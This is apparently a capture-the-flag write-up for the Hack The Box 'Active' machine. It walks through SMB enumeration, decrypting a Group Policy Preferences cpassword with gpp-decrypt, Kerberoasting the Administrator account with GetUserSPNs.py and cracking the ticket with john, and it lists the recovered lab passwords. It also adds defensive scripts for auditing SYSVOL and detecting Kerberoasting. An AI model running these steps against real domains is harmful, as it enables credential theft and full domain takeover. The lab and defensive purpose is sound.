Hackthebox.eu - Retired - Active
Recon
As always, I start with a simple up/down scan of all TCP ports to see what is open:
# nmap -T4 -p- -oX /root/Desktop/HTB/Active/nmapb.xml 10.10.10.100
A bunch of open ports. Let's scan those ports again with -A to see if we can fingerprint the OS and services:
# nmap -T4 -A -p53,88,135,139,389,445,464,593,636,3268,3269,9389,47001,49152,49153,49154,49155,49157,49158,19469,49170,49180 -oX /root/Desktop/HTB/Active/nmapf.xml 10.10.10.100
Lots of ports are open: 53 for DNS, plus NetBIOS and LDAP. Since this is a Windows machine with SMB exposed, let's see what we can find via SMB.
Exploit
Let's map the shares:
smbmap -H 10.10.10.100
There is only one share that we can connect to, so let's see what's there.
root@kali-iMac:~# smbclient //10.10.10.100/replication
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Jul 21 03:37:44 2018
.. D 0 Sat Jul 21 03:37:44 2018
active.htb D 0 Sat Jul 21 03:37:44 2018
10459647 blocks of size 4096. 4931605 blocks available
After digging around in the share I found a Groups.xml file in one of the directories. I downloaded it to my machine with get and found a cpassword attribute in it:
cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
So in theory this cpassword is the password for active.htb\SVC_TGS, which I assume is an Active Directory service account.
I ran the cpassword through gpp-decrypt, the decryption tool built into Kali, to recover the plaintext password:
root@kali-iMac:~/Desktop# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18
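The reason this works is that Group Policy Preferences stores account passwords in SYSVOL as a cpassword attribute that any domain user can read. The defender's fix is to find and remove every such item, then rotate the affected accounts. The script below is an added example written for this page, not part of the writeup or of gpp-decrypt: it walks a SYSVOL-style directory, parses the GPP XML files that can carry a cpassword, and reports each offending element without decrypting anything. The sample XML and the GPO folder names are constructed, and the cpassword value is a placeholder rather than a real ciphertext.

```python
"""Audit Group Policy Preference XML files for leftover cpassword attributes.

Added defensive example, not part of this writeup: it walks a SYSVOL-style
directory tree, parses the GPP XML files that can carry credentials and
reports every element that still has a cpassword attribute. Nothing is
decrypted; the finding alone is what an administrator needs in order to
delete the preference item and rotate the account.
"""
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP preference files that are known to carry a cpassword attribute
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# Attribute names the different file types use for the account name
ACCOUNT_ATTRS = ("userName", "username", "accountName", "runAs")


def find_cpasswords(xml_text, source="<string>"):
    """Return one finding per element in xml_text that has a cpassword attribute."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return [{"file": source, "element": None, "user": None,
                 "has_value": False, "error": str(exc)}]
    findings = []
    for elem in root.iter():
        if "cpassword" not in elem.attrib:
            continue
        user = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "?")
        findings.append({"file": source, "element": elem.tag, "user": user,
                         "has_value": bool(elem.get("cpassword"))})
    return findings


def audit_sysvol(root_dir):
    """Walk root_dir (a SYSVOL copy or mount) and audit every GPP XML file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name in GPP_FILES:
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8") as fh:
                    findings.extend(find_cpasswords(fh.read(), path))
    return findings


# Constructed sample with the same shape as the Groups.xml found on the box.
# The cpassword value is a placeholder, not a real ciphertext.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="active.htb\\SVC_TGS" image="2">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="PLACEHOLDER_NOT_A_REAL_CIPHERTEXT"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
                userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>
"""

# Constructed sample of a preference item that stores no password at all.
CLEAN_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <Group name="Remote Desktop Users">
    <Properties action="U" groupName="Remote Desktop Users"/>
  </Group>
</Groups>
"""


def demo_audit():
    """Write both samples into a throwaway SYSVOL-like tree and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        # GPO folder names are placeholders, not real GPO GUIDs
        gpo = os.path.join(tmp, "Policies", "{GPO-GUID-PLACEHOLDER}",
                           "MACHINE", "Preferences", "Groups")
        os.makedirs(gpo)
        with open(os.path.join(gpo, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        clean = os.path.join(tmp, "Policies", "{OTHER-GPO-PLACEHOLDER}",
                             "MACHINE", "Preferences", "Groups")
        os.makedirs(clean)
        with open(os.path.join(clean, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(CLEAN_GROUPS_XML)
        return audit_sysvol(tmp)


if __name__ == "__main__":
    for f in demo_audit():
        print(f"{f['file']}: <{f['element']}> for {f['user']} still carries cpassword")
```

Point audit_sysvol at a copy of \\domain\SYSVOL (or the Replication share seen here) and every hit is a preference item to delete and an account whose password must be changed; the presence of the attribute is the finding, so the script never needs the decryption key.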
So let's try enumerating again with this user/pass:
active.htb\SVC_TGS
GPPstillStandingStrong2k18
Now we have access to a bunch more shares :) We can now get into the Users folder, but still can't reach the admin password, so let's find a way to get there.
Kerberoast is what we will use to get that:
"Any valid domain user can request a kerberos ticket for any domain service (or even services outside the domain as long as there is a trust there). Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as. The users running these services usually are at the very least administrators on the computers for which they are a service on, but more commonly they are some sort of administrative account (Domain Admins)."
So we will use GetUserSPNs.py to request a ticket. You will need to add "10.10.10.100 active.htb" to your /etc/hosts so the tool can resolve the domain:
# ./GetUserSPNs.py -request active.htb/SVC_TGS
Looks like we get a ticket back for the Administrators account.
I ran the script again, this time saving the output to a file, which gives us this:
Now let's throw that file at john with rockyou.txt to see if we can crack the password.
We got a password:
Ticketmaster1968
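Every service ticket the GetUserSPNs.py step asks for is logged on the domain controller as Security event 4769 once Kerberos service ticket auditing is enabled, and a Kerberoast request typically stands out because it asks for an RC4-HMAC (etype 0x17) ticket for a user account that has an SPN. The script below is an added detection example written for this page, not part of the writeup or of any tool it uses: it groups RC4 service-ticket requests for non-machine accounts by requesting principal and source address. The events are constructed samples using the 4769 field names; the requester names, addresses and status codes are made up rather than taken from the box.

```python
"""Flag Kerberoast-style service ticket requests in Security event 4769 data.

Added defensive example, not part of this writeup. A Kerberoast run asks the
domain controller for a TGS ticket for every user account with an SPN, and
typically asks for the RC4-HMAC etype (0x17) because those tickets crack
fastest. Each request is logged as event 4769 on the DC when service ticket
auditing is on, so the heuristic below groups RC4 service-ticket requests
for non-machine accounts by requesting principal and source address.
The events are constructed samples using the 4769 field names.
"""
from collections import defaultdict

RC4_HMAC = "0x17"              # TicketEncryptionType of a classic Kerberoast request
SUCCESS = "0x0"                # Status of an issued ticket
IGNORED_SERVICES = {"krbtgt"}  # a TGS for krbtgt is a TGT renewal, not an SPN lookup


def is_roastable_request(event):
    """True for a successful RC4 TGS request against a non-machine service account.

    Machine accounts (names ending in $) have long random passwords, so a
    ticket for them is not worth cracking and is normal background noise.
    """
    service = event["ServiceName"]
    if service.lower() in IGNORED_SERVICES or service.endswith("$"):
        return False
    if event.get("Status", SUCCESS) != SUCCESS:
        return False
    return event["TicketEncryptionType"].lower() == RC4_HMAC


def kerberoast_candidates(events, min_services=1):
    """Return {(requester, ip): [services]} for sources that pulled RC4
    tickets for at least min_services distinct service accounts."""
    by_source = defaultdict(set)
    for ev in events:
        if ev.get("EventID") == 4769 and is_roastable_request(ev):
            by_source[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
    return {src: sorted(svcs) for src, svcs in by_source.items()
            if len(svcs) >= min_services}


# Constructed sample events (field names as in 4769; values are made up).
SAMPLE_EVENTS = [
    # an RC4 ticket for the account holding the SPN, as the request above would log
    {"EventID": 4769, "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:10.10.14.5"},
    # ordinary AES256 ticket for a machine account from the same requester
    {"EventID": 4769, "TargetUserName": "SVC_TGS@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:10.10.14.5"},
    # a workstation renewing its TGT: krbtgt with RC4 is ignored
    {"EventID": 4769, "TargetUserName": "WS01$@ACTIVE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "::ffff:10.10.10.50"},
    # failed request (0x7, principal unknown): no ticket issued, nothing to crack
    {"EventID": 4769, "TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "Status": "0x7", "IpAddress": "::ffff:10.10.10.51"},
    # a 4768 (TGT request) is a different event type and is skipped
    {"EventID": 4768, "TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "::ffff:10.10.10.51"},
]


if __name__ == "__main__":
    for (user, ip), services in kerberoast_candidates(SAMPLE_EVENTS).items():
        print(f"{user} from {ip} requested RC4 tickets for: {', '.join(services)}")
```

In a real environment raise min_services once you know the baseline, since a tool that sweeps every SPN produces many distinct services from one source in seconds, while a single RC4 ticket may just be a legacy client. The lasting fix is the one this box demonstrates the need for: long random passwords (or group managed service accounts) for any user account that carries an SPN, and AES-only encryption types so RC4 requests become rare enough to alert on.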
Let's use that to get the root flag as administrator.
I connected to the C$ share with the administrator login and password to browse all the files under C:\.
root
b5fc*******************
User
86d6******************